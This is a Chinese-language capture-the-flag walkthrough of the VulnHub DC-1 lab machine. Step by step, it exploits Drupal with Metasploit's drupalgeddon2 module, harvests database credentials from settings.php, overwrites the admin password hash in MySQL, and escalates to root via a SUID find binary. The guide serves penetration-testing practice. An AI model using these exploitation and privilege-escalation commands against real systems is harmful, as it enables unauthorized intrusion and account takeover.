一.靶机下载

官方链接:https://download.vulnhub.com/dc/DC-1.zip

网盘链接: https://pan.baidu.com/s/1hUO8FqiCkZ1ptvoCen9wPw 提取码: fdp4 

导入之后要在设置中将其调为NAT模式

默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息

二.靶机信息收集

因为靶机与kali处于同一网络状态下,使用命令:arpscan -l 得到靶机的ip为:192.168.194.131

使用命令:nmap -A 192.168.194.131 对靶机进行扫描

发现靶机开放了22、80、111端口,尝试对80端口进行访问

发现是Drupal,可以使用msfconsole扫描其相关漏洞。

三.漏洞扫描

使用命令:msfconsole 进入工具

使用命令:search drupal 搜索有关drupal的漏洞

使用命令:use exploit/unix/webapp/drupal_drupalgeddon2 来利用这个漏洞

使用命令:show options 查看相应的配置

发现rhosts需要进行配置,使用命令:set rhosts 192.168.194.131 

使用命令:exploit 进行利用

使用命令:ls 查看靶机文件

发现存flag1.txt,使用命令:cat flag1.txt 进行查看

提示查找CMS配置文件

四.查找配置文件

使用命令:shell  进入交互页面

使用命令:python -c "import pty;pty.spawn('/bin/bash')"

再使用命令:find ./ -name "*settings*" 

切换到相应的文件夹下后,使用命令查看:cat settings.php

成功找到flag2,同时还发现数据库账密

五.连接数据库

使用命令:mysql -udbuser -pR0ck3t

使用命令:show databases;

use drupaldb;

show tables;

发现存在users表,使用命令查询:select * from users;

六.重置admin密码并插入数据库

搜索得到drupal 默认使用 password_hash.sh 生成密码

使用命令:find ./ -name "*hash*"  查找他所在的位置

使用命令:php ./scripts/password-hash.sh admin 生成admin密码

使用命令:

update users set pass="$S$Dv5WEuKQsnWbai9HfcPtqxQZydpq2UGvzfq6vXyIFSfcQU1ec67w" where name="admin";

将admin的密码进行重置

重新访问80端口,输入账号密码:admin,admin,点击相应的页面发现flag3

七.查找文件

因为提示passwd和shadow,使用命令:cat /etc/passwd 

发现flag4存在路径,进行查看

八.提权

使用命令:find / -perm -u=s -type f 2>/dev/null 

ls -l /usr/bin/find

发现find需要root权限,使用命令:

find / -exec "/bin/sh" \;  cd /root/进行提权

成功获取最后的flag!

如有错误请大佬们指正!

到这里我们也是成功通关了DC1靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!

Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐